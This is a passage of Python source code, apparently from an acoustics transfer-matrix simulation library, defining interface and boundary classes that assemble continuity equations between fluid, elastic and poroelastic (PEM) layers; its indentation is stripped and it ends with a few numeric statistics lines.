M[i_eq, self.layers[1].dofs[3]] = -SV_2[2, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = -SV_2[2, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = -SV_2[2, 5]*delta_1[2]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV_1[1, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = SV_1[1, 1]
M[i_eq, self.layers[1].dofs[0]] = -SV_2[4, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[4, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[4, 2]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[4, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = -SV_2[4, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = -SV_2[4, 5]*delta_1[2]
i_eq += 1
M[i_eq, self.layers[1].dofs[0]] = SV_2[0, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[0, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[0, 2]
M[i_eq, self.layers[1].dofs[3]] = SV_2[0, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = SV_2[0, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = SV_2[0, 5]*delta_1[2]
i_eq += 1
M[i_eq, self.layers[1].dofs[0]] = SV_2[3, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[3, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[3, 2]
M[i_eq, self.layers[1].dofs[3]] = SV_2[3, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = SV_2[3, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = SV_2[3, 5]*delta_1[2]
i_eq += 1
return i_eq
class PemFluidInterface(PwInterface):
"""
PEM-Fluid interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t PEM-Fluid interface"
return out
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam[0]*self.layers[1].d)
SV_1 = self.layers[0].SV
SV_2 = self.layers[1].SV
M[i_eq, self.layers[0].dofs[0]] = -SV_1[2, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[2, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[2, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[2, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[2, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[2, 5]
M[i_eq, self.layers[1].dofs[0]] = SV_2[0, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[0, 1]*delta_1
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = -SV_1[4, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[4, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[4, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[4, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[4, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[4, 5]
M[i_eq, self.layers[1].dofs[0]] = SV_2[1, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[1, 1]*delta_1
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV_1[0, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[0, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[0, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[0, 3]
M[i_eq, self.layers[0].dofs[4]] = SV_1[0, 4]
M[i_eq, self.layers[0].dofs[5]] = SV_1[0, 5]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV_1[3, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[3, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[3, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[3, 3]
M[i_eq, self.layers[0].dofs[4]] = SV_1[3, 4]
M[i_eq, self.layers[0].dofs[5]] = SV_1[3, 5]
i_eq += 1
return i_eq
class FluidElasticInterface(PwInterface):
"""
Fluid-Elastic interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Fluid-Elastic interface"
return out
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam[0]*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam*self.layers[1].d)
SV_1 = self.layers[0].SV
SV_2 = self.layers[1].SV
# Continuity of u_y
M[i_eq, self.layers[0].dofs[0]] = SV_1[0, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = SV_1[0, 1]
M[i_eq, self.layers[1].dofs[0]] = -SV_2[1, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[1, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[1, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[1, 3]*delta_1[1]
i_eq += 1
# sigma_yy = -p
M[i_eq, self.layers[0].dofs[0]] = SV_1[1, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = SV_1[1, 1]
M[i_eq, self.layers[1].dofs[0]] = SV_2[2, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[2, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[2, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = SV_2[2, 3]*delta_1[1]
i_eq += 1
# sigma_xy = 0
M[i_eq, self.layers[1].dofs[0]] = -SV_2[0, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[0, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[0, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[0, 3]*delta_1[1]
i_eq += 1
return i_eq
def transfert(self, O):
tau = -O[0,0]/O[0,1]
Omega_minus = np.array([[O[1,1]], [-O[2,1]]])*tau + np.array([[O[1,0]], [-O[2,0]]])
tau_tilde = np.concatenate([np.eye(1,1), np.array([[tau]])])
return (Omega_minus, tau_tilde)
class ElasticFluidInterface(PwInterface):
"""
Elastic-Fluid interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Elastic-Fluid interface"
return out
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam[0]*self.layers[1].d)
SV_1 = self.layers[0].SV
SV_2 = self.layers[1].SV
# Continuity of u_y
M[i_eq, self.layers[0].dofs[0]] = -SV_1[1, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[1, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[1, 2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[1, 3]
M[i_eq, self.layers[1].dofs[0]] = SV_2[0, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[0, 1]*delta_1
i_eq += 1
# sigma_yy = -p
M[i_eq, self.layers[0].dofs[0]] = SV_1[2, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[2, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[2, 2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[2, 3]
M[i_eq, self.layers[1].dofs[0]] = SV_2[1, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[1, 1]*delta_1
i_eq += 1
# sigma_xy = 0
M[i_eq, self.layers[0].dofs[0]] = -SV_1[0, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[0, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[0, 2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[0, 3]
i_eq += 1
return i_eq
def transfert(self, Om):
Omega_moins = np.zeros((4,2), dtype=np.complex)
Omega_moins[1,0] = Om[0,0]
Omega_moins[2,0] = -Om[1,0]
Omega_moins[3,1] = 1
Tau_tilde = np.zeros((1,2), dtype=np.complex)
Tau_tilde[0,0] = 1
return (Omega_moins, Tau_tilde.reshape(1,2))
class ElasticElasticInterface(PwInterface):
"""
Elastic-Elastic interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Elastic-Fluid interface"
return out
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam*self.layers[1].d)
SV_1 = self.layers[0].SV
SV_2 = self.layers[1].SV
# Continuity of u_y
for _i in range(4):
M[i_eq, self.layers[0].dofs[0]] = -SV_1[_i, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[_i, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[_i, 2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[_i, 3]
M[i_eq, self.layers[1].dofs[0]] = SV_2[_i, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[_i, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[_i, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = SV_2[_i, 3]*delta_1[1]
i_eq += 1
return i_eq
def transfert(self, Om):
return Om, np.eye(2)
class PemPemInterface(PwInterface):
"""
PEM-PEM interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t PEM-PEM interface"
return out
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam*self.layers[1].d)
SV_1 = self.layers[0].SV
SV_2 = self.layers[1].SV
# Continuity of u_y
for _i in range(6):
M[i_eq, self.layers[0].dofs[0]] = -SV_1[_i, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[_i, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[_i, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[_i, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[_i, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[_i, 5]
M[i_eq, self.layers[1].dofs[0]] = SV_2[_i, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[_i, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[_i, 2]
M[i_eq, self.layers[1].dofs[3]] = SV_2[_i, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = SV_2[_i, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = SV_2[_i, 5]*delta_1[2]
i_eq += 1
return i_eq
def transfert(self, O):
return (O, np.eye(3))
class ElasticPemInterface(PwInterface):
"""
Elastic-PEM interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Elastic-PEM interface"
return out
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam*self.layers[1].d)
SV_1 = self.layers[0].SV
''' S={0:\sigma_{xy}, 1: u_y, 2 \sigma_{yy}, 3 u_x}'''
SV_2 = self.layers[1].SV
''' S={0:\hat{\sigma}_{xy}, 1:u_y^s, 2:u_y^t, 3:\hat{\sigma}_{yy}, 4:p, 5:u_x^s}'''
# Continuity of simga_xy
M[i_eq, self.layers[0].dofs[0]] = SV_1[0, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[0, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[0, 2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[0, 3]
M[i_eq, self.layers[1].dofs[0]] = -SV_2[0, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[0, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[0, 2]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[0, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = -SV_2[0, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = -SV_2[0, 5]*delta_1[2]
i_eq += 1
# Continuity of u_y^s
M[i_eq, self.layers[0].dofs[0]] = SV_1[1, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[1, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[1, 2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[1, 3]
M[i_eq, self.layers[1].dofs[0]] = -SV_2[1, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[1, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[1, 2]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[1, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = -SV_2[1, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = -SV_2[1, 5]*delta_1[2]
i_eq += 1
# Continuity of u_y^t
M[i_eq, self.layers[0].dofs[0]] = SV_1[1, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[1, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[1, 2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[1, 3]
M[i_eq, self.layers[1].dofs[0]] = -SV_2[2, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[2, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[2, 2]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[2, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = -SV_2[2, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = -SV_2[2, 5]*delta_1[2]
i_eq += 1
# Continuity of sigma_yy = \hat{\sigma_yy)-p)
M[i_eq, self.layers[0].dofs[0]] = -SV_1[2, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[2, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[2, 2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[2, 3]
M[i_eq, self.layers[1].dofs[0]] = (SV_2[3, 0]-SV_2[4, 0])
M[i_eq, self.layers[1].dofs[1]] = (SV_2[3, 1]-SV_2[4, 1])
M[i_eq, self.layers[1].dofs[2]] = (SV_2[3, 2]-SV_2[4, 2])
M[i_eq, self.layers[1].dofs[3]] = (SV_2[3, 3]-SV_2[4, 3])*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = (SV_2[3, 4]-SV_2[4, 4])*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = (SV_2[3, 5]-SV_2[4, 5])*delta_1[2]
i_eq += 1
# Continuity of u_x^s
M[i_eq, self.layers[0].dofs[0]] = SV_1[3, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[3, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[3, 2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[3, 3]
M[i_eq, self.layers[1].dofs[0]] = -SV_2[5, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[5, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[5, 2]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[5, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = -SV_2[5, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = -SV_2[5, 5]*delta_1[2]
i_eq += 1
return i_eq
def transfert(self, O):
Dplus = np.array([0, 1, -1, 0, 0, 0])
Dmoins = np.zeros((4,6), dtype=np.complex)
Dmoins[0,0] = 1
Dmoins[1,1] = 1
Dmoins[2,3] = 1
Dmoins[2,4] = -1
Dmoins[3,5] = 1
Tau = -Dplus.dot(O[:,2:4])**-1 * np.dot(Dplus, O[:,0:2])
Omega_moins = Dmoins.dot(O[:,0:2] + O[:,2:4]*Tau)
Tau_tilde = np.vstack([np.eye(2), Tau])
return (Omega_moins, Tau_tilde)
class PemElasticInterface(PwInterface):
"""
PEM-Elastic interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t PEM-Elastic interface"
return out
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam*self.layers[1].d)
SV_1 = self.layers[0].SV
SV_2 = self.layers[1].SV
# Continuity of simga_xy
M[i_eq, self.layers[0].dofs[0]] = -SV_1[0, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[0, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[0, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[0, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[0, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[0, 5]
M[i_eq, self.layers[1].dofs[0]] = SV_2[0, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[0, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[0, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = SV_2[0, 3]*delta_1[1]
i_eq += 1
# Continuity of u_y^s
M[i_eq, self.layers[0].dofs[0]] = -SV_1[1, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[1, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[1, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[1, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[1, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[1, 5]
M[i_eq, self.layers[1].dofs[0]] = SV_2[1, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[1, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[1, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = SV_2[1, 3]*delta_1[1]
i_eq += 1
# Continuity of u_y^t
M[i_eq, self.layers[0].dofs[0]] = -SV_1[2, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[2, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[2, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[2, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[2, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[2, 5]
M[i_eq, self.layers[1].dofs[0]] = SV_2[1, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[1, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[1, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = SV_2[1, 3]*delta_1[1]
i_eq += 1
# Continuity of sigma_yy = \hat{\sigma_yy)-p)
M[i_eq, self.layers[0].dofs[0]] = (SV_1[3, 0]-SV_1[4, 0])*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = (SV_1[3, 1]-SV_1[4, 1])*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = (SV_1[3, 2]-SV_1[4, 2])*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = (SV_1[3, 3]-SV_1[4, 3])
M[i_eq, self.layers[0].dofs[4]] = (SV_1[3, 4]-SV_1[4, 4])
M[i_eq, self.layers[0].dofs[5]] = (SV_1[3, 5]-SV_1[4, 5])
M[i_eq, self.layers[1].dofs[0]] = -SV_2[2, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[2, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[2, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[2, 3]*delta_1[1]
i_eq += 1
# Continuity of u_x^s
M[i_eq, self.layers[0].dofs[0]] = -SV_1[5, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[5, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[5, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[5, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[5, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[5, 5]
M[i_eq, self.layers[1].dofs[0]] = SV_2[3, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[3, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[3, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = SV_2[3, 3]*delta_1[1]
i_eq += 1
return i_eq
def transfert(self, O):
Omega_moins = np.zeros((6,3), dtype=np.complex)
Omega_moins[0,0:2] = O[0,0:2]
Omega_moins[1,0:2] = O[1,0:2]
Omega_moins[2,0:2] = O[1,0:2]
Omega_moins[3,0:2] = O[2,0:2]
Omega_moins[3,2] = 1
Omega_moins[4,2] = 1
Omega_moins[5,0:2] = O[3,0:2]
Tau_tilde = np.zeros((2,3), dtype=np.complex)
Tau_tilde[0,0] = 1
Tau_tilde[1,1] = 1
return (Omega_moins, Tau_tilde)
class FluidRigidBacking(PwInterface):
"""
Rigid backing for a fluid layer
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Rigid backing"
return out
def update_M_global(self, M, i_eq):
M[i_eq, self.layers[0].dofs[0]] = self.layers[0].SV[0, 0]*np.exp(self.layers[0].lam[0]*self.layers[0].d)
M[i_eq, self.layers[0].dofs[1]] = self.layers[0].SV[0, 1]
i_eq += 1
return i_eq
def Omega(self):
return np.array([0,1], dtype=np.complex)
class PemBacking(PwInterface):
"""
Rigid backing for a pem layer
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Rigid backing"
return out
def update_M_global(self, M, i_eq):
delta = np.exp(self.layers[0].lam*self.layers[0].d)
SV = self.layers[0].SV
M[i_eq, self.layers[0].dofs[0]] = SV[1, 0]*delta[0]
M[i_eq, self.layers[0].dofs[1]] = SV[1, 1]*delta[1]
M[i_eq, self.layers[0].dofs[2]] = SV[1, 2]*delta[2]
M[i_eq, self.layers[0].dofs[3]] = SV[1, 3]
M[i_eq, self.layers[0].dofs[4]] = SV[1, 4]
M[i_eq, self.layers[0].dofs[5]] = SV[1, 5]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV[2, 0]*delta[0]
M[i_eq, self.layers[0].dofs[1]] = SV[2, 1]*delta[1]
M[i_eq, self.layers[0].dofs[2]] = SV[2, 2]*delta[2]
M[i_eq, self.layers[0].dofs[3]] = SV[2, 3]
M[i_eq, self.layers[0].dofs[4]] = SV[2, 4]
M[i_eq, self.layers[0].dofs[5]] = SV[2, 5]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV[5, 0]*delta[0]
M[i_eq, self.layers[0].dofs[1]] = SV[5, 1]*delta[1]
M[i_eq, self.layers[0].dofs[2]] = SV[5, 2]*delta[2]
M[i_eq, self.layers[0].dofs[3]] = SV[5, 3]
M[i_eq, self.layers[0].dofs[4]] = SV[5, 4]
M[i_eq, self.layers[0].dofs[5]] = SV[5, 5]
i_eq += 1
return i_eq
def Omega(self):
Om = np.zeros((6,3), dtype=np.complex)
Om[0,1] = 1.
Om[3,2] = 1.
Om[4,0] = 1.
return Om
class ElasticBacking(PwInterface):
"""
Rigid backing for an elastic layer
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Rigid backing"
return out
def Omega(self):
Om = np.zeros((4,2), dtype=np.complex)
Om[0,1] = 1.
Om[2,0] = 1.
return Om
def update_M_global(self, M, i_eq):
delta = np.exp(self.layers[0].lam*self.layers[0].d)
SV = self.layers[0].SV
M[i_eq, self.layers[0].dofs[0]] = SV[1, 0]*delta[0]
M[i_eq, self.layers[0].dofs[1]] = SV[1, 1]*delta[1]
M[i_eq, self.layers[0].dofs[2]] = SV[1, 2]
M[i_eq, self.layers[0].dofs[3]] = SV[1, 3]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV[3, 0]*delta[0]
M[i_eq, self.layers[0].dofs[1]] = SV[3, 1]*delta[1]
M[i_eq, self.layers[0].dofs[2]] = SV[3, 2]
M[i_eq, self.layers[0].dofs[3]] = SV[3, 3]
i_eq += 1
return i_eq
class SemiInfinite(PwInterface):
"""
Semi-infinite boundary
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
self.medium = load_material("Air")
self.SV = None
def __str__(self):
out = "\t Semi-infinite transmission medium"
return out
def update_frequency(self, omega, kx):
self.medium.update_frequency(omega)
self.SV, self.lam = fluid_waves_TMM(self.medium, kx)
self.k = self.medium.k
self.kx = kx
self.omega = omega
def Omega(self):
if self.layers[0].medium.MEDIUM_TYPE in ["fluid", "eqf"]:
return np.array([-self.lam[0]/(self.medium.rho*self.omega**2), 1], dtype=np.complex), np.eye(1)
elif self.layers[0].medium.MEDIUM_TYPE == "elastic":
Om = np.zeros((4, 2), dtype=complex)
Om[1, 0] = -self.lam[0]/(self.medium.rho*self.omega**2)
Om[2, 0] = -1. # \sigma_{yy} is -p
Om[3, 1] = 1.
return Om, np.eye(2)
elif self.layers[0].medium.MEDIUM_TYPE == "pem":
Om = np.zeros((6, 3), dtype=complex)
Om[1, 1] = 1.
Om[2, 0] = -self.lam[0]/(self.medium.rho*self.omega**2)
Om[4, 0] = 1.
Om[5, 2] = 1.
return Om, np.eye(3)
def update_M_global(self, M, i_eq):
if self.layers[0].medium.MEDIUM_TYPE in ["fluid", "eqf"]:
delta_0 = np.exp(self.layers[0].lam[0]*self.layers[0].d)
M[i_eq, self.layers[0].dofs[0]] = self.layers[0].SV[0, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = self.layers[0].SV[0, 1]
M[i_eq, -1] = -self.SV[0, 0]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = self.layers[0].SV[1, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = self.layers[0].SV[1, 1]
M[i_eq, -1] = -self.SV[1, 0]
i_eq += 1
elif self.layers[0].medium.MEDIUM_TYPE == "pem":
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
SV_1 = self.layers[0].SV
M[i_eq, self.layers[0].dofs[0]] = -SV_1[2, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[2, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[2, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[2, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[2, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[2, 5]
M[i_eq, -1] = self.SV[0, 0]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = -SV_1[4, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[4, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[4, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[4, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[4, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[4, 5]
M[i_eq, -1] = self.SV[1, 0]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV_1[0, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[0, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[0, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[0, 3]
M[i_eq, self.layers[0].dofs[4]] = SV_1[0, 4]
M[i_eq, self.layers[0].dofs[5]] = SV_1[0, 5]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV_1[3, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[3, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[3, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[3, 3]
M[i_eq, self.layers[0].dofs[4]] = SV_1[3, 4]
M[i_eq, self.layers[0].dofs[5]] = SV_1[3, 5]
i_eq += 1
elif self.layers[0].medium.MEDIUM_TYPE == "elastic":
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
SV_1 = self.layers[0].SV
# Continuity of u_y
M[i_eq, self.layers[0].dofs[0]] = -SV_1[1, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[1, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[1, 2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[1, 3]
M[i_eq, -1] = self.SV[0, 0]
i_eq += 1
# sigma_yy = -p
M[i_eq, self.layers[0].dofs[0]] = SV_1[2, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[2, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[2, 2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[2, 3]
M[i_eq, -1] = self.SV[1, 0]
i_eq += 1
# sigma_xy = 0
M[i_eq, self.layers[0].dofs[0]] = -SV_1[0, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[0, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[0, 2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[0, 3]
i_eq += 1
return i_eq
| 40.869507
| 120
| 0.533998
| 5,911
| 30,693
| 2.590425
| 0.035358
| 0.2436
